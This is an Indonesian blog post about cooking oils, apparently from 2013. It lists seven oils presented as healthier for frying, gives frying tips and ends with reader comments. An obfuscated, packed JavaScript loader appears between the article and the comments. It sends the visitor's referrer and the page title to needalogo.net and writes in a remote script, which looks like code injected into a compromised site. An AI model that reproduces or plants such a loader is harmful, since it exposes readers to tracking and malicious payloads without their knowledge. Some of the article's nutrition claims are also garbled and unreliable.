browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

Nyakk… Minyakkk ….. Goreng ….

Posted by on March 25, 2013

minyakJaman sekarang, hampir mustahil kalau tidak pernah menggoreng atau makan/mengkonsumsi hasil gorengan. Nah berarti pasti kenal yang namanya minyak  goreng kan..

Bagi sebagian orang, makanan yang digoreng memang biasanya lebih enak karena rasanya yang khas dan teksturnya yang cenderung crunchy. Tetapi perlu hati hati karena makanan yang digoreng biasanya mengandung lemak dan kolesterol yang tinggi.

Ada kabar baik bagi pecinta gorengan, seperti diulas Timesofindia ada tujuh jenis minyak berikut yang mungkin sedikit lebih aman dikonsumsi karena kadar lemak maupun kolesterol yang lebih rendah dibanding minyak goreng biasa, yaitu:

Sunflower
Minyak ini paling umum digunakan di India, karena kaya akan PUFA terutama asam linoleat. Minyak ini juga bagus untuk menurunkan kadar kolesterol, sehingga akan jadi lebih baik memakai minyak ini dengan dikombinasi minyak lain seperti minyak palmolein.

Ghee
Minyak ini disebut mentega, dibuat dari lemak hewan dan di dalamnya mengandung lemak jenuh. Minyak ini pun dibuat dari beberapa sifat obat, sehingga manfaat dan kualitas dari minyak ini digunakan sangat hemat pada makanan Anda.

Minyak kelapa
Minyak ini banyak digunakan di bagian selatan India. Sayangnya minyak kelapa terkadang dibilang tidak sehat, sementara minyak ini mengandung lemak jenuh dan sangat berbeda dari minyak kelapa yang ada, karena di dalamnya terdapat minyak nabati. Minyak ini juga tidak mengandung kolesterol sehingga bisa dikonsumsi untuk memasak serta dikombinasikan dengan minyak lain.

Minyak kacang tanah
minyak kacang tanah bagus buat menurunkan kadar kolesterol dalam tubuh tanpa menurunkan kadar kolesterol yang baik. Minyak ini juga disediakan dalam bentuk sudah disaring. Minyak ini cocok untuk semua jenis memasak, mulai dari menggoreng, memanggang.

Minyak mustard
minyak yang satu ini dijual sebagai minyak sayur. Minyak ini juga bisa digunakan dalam jumlah kecil untuk mengolah sayuran, karena dapat memiliki efek yang tidak diinginkan terhadao kesehatan jika digunakan dalam jumlah besar.

Minyak kulit padi
minyak kulit padi bisa menurunkan kolesterol karena adanya komponen dalam minyak yang disebut oryzanol, mengandung vitamin E alami, kadar antioksidan pun bagus buat kulit. minyak ini tidak baik digunakan untuk memasak dengan suhu panas tinggi, karena sifatnya tidak teurai sehingga membentuk senyawa beracun, makan sebatas cocok untuk digoreng.

Minyak zaitun
Minyak ini membantu menurunkan kolesterol jahat, berbagai tahapan menekan dan pengolahan hasil beberapa varietas minyak zaitun, Minyak ekstra virgin sangat baik untuk diolah menjadi salad dressing, jangan gunakan memasak apa saja di panas tinggi.

Selain itu, tips berikut mungkin layak dicoba untuk mendapatkan hasil gorengan yang relatif lebih sehat;

Gunakan Suhu Rendah
Untuk memaksimalkan manfaatnya, pakai api sedang/kecil bersuhu rendah untuk memasak/- menggoreng makanan. Sebab, suhu tinggi bisa mengurai rantai kimia minyak yang berimbas pada lenyapnya zat gizi yang terkandung dalam makanan tersebut.

Cukup Dua Kali
Tahu minyak jelantah? Sebagian orang menyukainya, terkadang dijadikan campuran sambal yang sedap. Jelantah adalah minyak yang sudah dipakai berulang- ulang kali. Ketidaktahuan kita akan bahaya di balik jelantah dan mungkin keinginan untuk berhemat, membuat kita menggunakan minyak goreng hingga 3, 4, 5 kali bahkan lebih. Warnanya berubah menjadi coklat keruh, atau kehitaman.

Nah …. jangan takut makan gorengan lagi ya, tapi ingat biasakan menggunakan minyak yang sehat dan cara yang sehat dalam menggoreng ….
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

3 Responses to Nyakk… Minyakkk ….. Goreng ….

  1. Alfanur Rizal

    hahaa.., yang blog itu buat ninggalin jejak doang mbak., wkakaakakakaka :d

  2. Dyah Sushanty

    yup …
    di Indonesia umumnya pake minyak kelapa sawit,

    betewe, kalo saya sebut merk ntar jadi iklan dong …. hahaha ….

    betewe lagi, blognya mas @cumipanggang mesti keren keren yaa….. jd pengen ketemu orangnya buat berguru, hehe…

    betewe terakhir, (semoga 3x betewe dapet mangkok cantik, hihihi) blog yg lama (http://tanyakenapa.staff.ub.ac.id/) akan dibagaimanakan nasibnya mas?

  3. Alfanur Rizal

    weeww.., tadi tak pikir mau nyebutin merek heheh.,, ternyata enggak..,
    minyak di indonesia itu minyak kelapa sawit ya mbak rata2??

    main ke blog-ku yang baru disini : New TanyaKenapa

Leave a Reply